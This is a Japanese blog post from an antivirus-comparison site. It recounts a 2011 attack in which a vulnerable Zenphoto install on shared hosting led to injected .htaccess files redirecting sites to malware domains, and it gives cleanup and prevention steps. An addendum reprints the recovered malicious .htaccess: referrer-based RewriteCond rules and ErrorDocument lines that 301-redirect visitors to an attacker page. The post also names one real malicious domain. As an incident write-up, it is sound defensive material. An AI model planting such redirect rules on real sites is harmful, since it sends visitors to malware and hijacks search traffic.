わかる!ウイルス対策|セキュリティソフト30日無料比較

無料CMSの危険性とガンブラー感染事例 htaccessを不正操作しウイルス配布サイトへ誘導Zenphotoとphpmyadminの脆弱性に注意

2011年11月10日に起きた事例

共用レンタルサーバー ヘテムル(heteml)からの通知によると写真管理用無料CMS Zenphotoの低いバージョンで脆弱性があり、不正アクセスの可能性があるとの警告があった。(ヘテムル利用者全体への通知があった)
こちらのCMSは簡単インストールといってサーバー利用者が管理画面内で簡単にサーバー内へCMSをインストールできるサービスで用意されていたシステム。
この攻撃に遭遇するとZenphotoがインストールされているサーバー内の最上階層などに.htaccessが生成されたり書き換えられたりする。

※注意 2011年11月25日加筆修正 phpmyadminの脆弱性についてはこの被害では関係ないものと判断したため訂正しております

これはこのCMSに限らず、ある意味全てのCMSユーザーへの注意喚起でもあります

WordPressサイト改ざん.htaccessリダイレクトアタック被害の応急処置方法〜ヘテムル利用者で被害拡大

■■実際の事例

これは2011年11月10日未明よりヘテムルサーバー内部にある複数の管理サイト(ドメイン)がXXXX.ruやXXXX.inなどのURLへリダイレクトされる現象が発生した。

FTP経由でサーバーを監視しているとヘテムルではユーザーが管理できる最上位の階層にwebというフォルダとappsというフォルダがデフォルトで用意されている。

他にデフォルトではファイルなどが存在しないはずだが、この日は何故か.htaccessが存在した。
さらにその下の階層webフォルダ内にも管理者が関与しない,htaccessが生成されている。このフォルダには複数のドメインを割り当てたフォルダやサイトデータが存在し、その全てのドメインがウイルス配布サイトと思わしきURLへリダイレクトされる状態になる。

 

2011-11-11_23-54-59.jpg

 

被害後の状況を一覧に書き残します

Googleの検索では検索結果のページタイトル下に危険なサイトの報告があります。といった警告が表示されるようになる。
ブラウザ(Firefox safari IE Chorome)で閲覧する際もあなたのコンピューターに被害を与える可能性がありますといった警告画面が出る。その際警告画面に表示されるURLは管理しているサイトのURLではなくリダイレクト先のURLが表示される(XXX.ruやXXX.inで時間帯によって様々なURLに変わっていく)

FTPソフトでサーバー内を目視で監視していると.htaccessを削除しても数分後、また見知らぬ.htaccessが生成される。

.htaccessの中身は不可視であったり、管理サイト(下層フォルダにある)にあるhtaccessの内容に近い物が最上階層に存在したりなど不確定な内容。

といった感じの被害を受ける。
被害を受けた内容はガンブラー.x的な内容と酷似している。
要は悪意の第三者がwebサイトをのっとり不正に偽ウイルス対策ソフトなどをインストールさせるサイトへ無理矢理ジャンプさせるといった症状が出る感じです。(ほとんどが.ruや.inといったURLへのリダイレクト)

感染後の対処方法

webサイトにこのような不正操作を発見したらいくつかの対処を施します。
今回の事例Zenphotoで解説します。
Zenphotoのバージョンを最新の1.51などへアップデートするようヘテムルから通知が有ります。
まずはこれに従いましょう。

それでも不安な場合はZenphotoのインストールフォルダをまるごとサーバー内から削除する。

Zenphotoがアクセスするデータベース(Mysql)を削除する。(PHPmyadminの脆弱性を狙ったガンブラーの場合PHPmyadminを不正に操作して.htaccessを生成したり操作するという事例が古くから存在するため)
一応、パソコンをウイルス対策ソフトで検査する(ウイルス感染の可能性も考えられるため)
FTPパスワードを変える(ガンブラーウイルス感染の場合だとFTPパスワードを盗まれていることも考えられるため)

phpmyadminについては今回の事例とは関係ない物と判断したため修正いたします。

とりあえず、被害に遭った場合はこのような対策法を覚えておくといいでしょう。

その他ガンブラーウイルス対策として

FTPソフトでのアクセスはFTPSで暗号化したアクセスにする
.ftpaccessをサーバーの最上階層などに設置し、FTPアクセスのIP制限をしておく
自分のパソコンは最新のOSにしておく
CMSを使う場合も最新のアップデートに対応しておく
ブラウザのバージョンも古い物から最新のバージョンへ
普段からFTPSでFTPアクセスをする
FTPパスワードはセキュリティを高めたあとに変更する

こういった対策が今のところ考えられます。
他にも細かい点をいえば自己管理におけるさまざまなソフトやアプリケーションのアップデートなども注意したいところです。

サイト改ざん後の復旧までの様子

これらの処置と対策をほどこし、サーバー内に.htaccessが生成されなくなりました。
WEBサイトはGoogleで危険サイトとして認識されているため、Googlewebマスターツールで該当するサイトのダッシュボードから再審査の申請をします。数時間後には元に戻ります。(放置すると検索結果のインデックスから全てのページが削除され検索経由のアクセスが全くなくなります)

リダイレクト方法が明確に確認できませんでしたが、301リダイレクトを使用している可能性もある。いくつかのサイトは短時間で危険サイトではなくなったが、いくつかのサイトはサイト内のCMS(ワードプレスやMTムーバブルタイプ)で管理画面に入ったあと、管理画面内でさきほどの悪意のURLへリダイレクトされそうになるなどDNSの反映に時間がかかっている雰囲気も確認できた。もし危険サイトと表示されなくなってもサイト内の遷移の中で不自然な動きがあるようなら1日以上様子を見てみる必要が有るかもしれない。

以上、最新のガンブラー系のウイルス感染に似たサーバー設置型のCMSの脆弱性を狙ったWEBサイト改ざんの実例と対処法。
無料のCMSであろうと有料のCMSであろうと普及が多いもの(ワードプレス)などでは以前よりスクリプトの改ざんなどが存在します。CMSの管理にはご注意ください。
また、今回もさまざまな危険なURLを発見しアクセスしましたが基本的に管理パソコン側でのウイルス感染はしておりません。

警備アクセス環境

MacOS Ⅹ
セキュリティ
ESET Cybersecurity for mac
ブラウザ
Firefoxほか

—————————————-

■追記

最終的にサーバー内部すべてを精査したところ一部の.htaccessを回収した。

内容はこったもので、もともと存在する.htaccessファイル内で書き換え改ざんされている。

数百行の改行や膨大なスペースを乱用して一見するともとの.htaccessと変わらないように見せかけて以下のような記載がありました。

※注意 下記コード内に発見した一部のURL(危険だったURL:masaskisoft.in)以下をそのまま掲載しますが、念のためアクセスはしないことを注意します。

(現時点ではこのURLはアクセス警告も消え存在しないURLとなっています 2011年11月13日)

ErrorDocument 400 http://xxxx.in/ahalai/index.php ErrorDocument 401 http://xxxx.in/ahalai/index.php ErrorDocument 403 http://xxxx.in/ahalai/index.php ErrorDocument 404 http://xxxx.in/ahalai/index.php ErrorDocument 500 http://xxxx.in/ahalai/index.php <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} .*google.* [OR] RewriteCond %{HTTP_REFERER} .*ask.* [OR] RewriteCond %{HTTP_REFERER} .*yahoo.* [OR] RewriteCond %{HTTP_REFERER} .*baidu.* [OR] RewriteCond %{HTTP_REFERER} .*youtube.* [OR] RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR] RewriteCond %{HTTP_REFERER} .*qq.* [OR] RewriteCond %{HTTP_REFERER} .*excite.* [OR] RewriteCond %{HTTP_REFERER} .*altavista.* [OR] RewriteCond %{HTTP_REFERER} .*msn.* [OR] RewriteCond %{HTTP_REFERER} .*netscape.* [OR] RewriteCond %{HTTP_REFERER} .*aol.* [OR] RewriteCond %{HTTP_REFERER} .*hotbot.* [OR] RewriteCond %{HTTP_REFERER} .*goto.* [OR] RewriteCond %{HTTP_REFERER} .*infoseek.* [OR] RewriteCond %{HTTP_REFERER} .*mamma.* [OR] RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR] RewriteCond %{HTTP_REFERER} .*lycos.* [OR] RewriteCond %{HTTP_REFERER} .*search.* [OR] RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR] RewriteCond %{HTTP_REFERER} .*bing.* [OR] RewriteCond %{HTTP_REFERER} .*dogpile.* [OR] RewriteCond %{HTTP_REFERER} .*facebook.* [OR] RewriteCond %{HTTP_REFERER} .*twitter.* [OR] RewriteCond %{HTTP_REFERER} .*blog.* [OR] RewriteCond %{HTTP_REFERER} .*live.* [OR] RewriteCond %{HTTP_REFERER} .*myspace.* [OR] RewriteCond %{HTTP_REFERER} .*mail.* [OR] RewriteCond %{HTTP_REFERER} .*yandex.* [OR] RewriteCond %{HTTP_REFERER} .*rambler.* [OR] RewriteCond %{HTTP_REFERER} .*ya.* [OR] RewriteCond %{HTTP_REFERER} .*aport.* [OR] RewriteCond %{HTTP_REFERER} .*linkedin.* [OR] RewriteCond %{HTTP_REFERER} .*flickr.* RewriteRule ^(.*)$ http://xxxx.in/ahalai/index.php [R=301,L]

結果的に301リダイレクトをされていたようで、.htaccessを修正してもドメインが通常稼働に戻るまで(DNSがもどるまで)少し時間がかかります。

また、phpmyadmin(データベースMysqlをブラウザで管理するソフト)を不正操作されていたようです。

phpmyadminのバージョンにおける脆弱性は存在するようですが、今回の被害については関係のない物と判断し修正いたします。

ワードプレスやムーバブルタイプを使っている人も、もし脆弱性が発見された場合は最新版へのアップデートなど最新の注意が必要です。

一般公開されたWEBサイトに対するウイルスのようなものですが、

サイト改ざん → 不正リダイレクト → 偽ソフト(これがウイルス)などをインストールさせる(あるいは閲覧しただけでスクリプトをブラウザなどに埋め込まれる) → 個人情報を盗まれる

といった被害が考えられるのでWEBマスター(管理者)は厳重な注意が必要です。

2014年以降のWindows XP未更新に強いセキュリティソフト

【Windows】【 Mac】【Android】全て対応

動作の軽さで選ばれて評価ナンバー1
ESET無料体験版

【Windows】【 Mac】【Android】全て対応

安定の人気ソフトといえばVB
ウイルスバスタークラウド無料体験

2件のコメント

  1. WordPressサイト改ざん.htaccessリダイレクトアタック被害の応急処置方法〜ヘテムル利用者で被害拡大

    先日の記事CMSを使ったWEBサイトを狙う.htaccessリダイレクトアタックというwebサイト改ざん被害が後を絶たず、レンタルサーバーへテムル利用者の…

]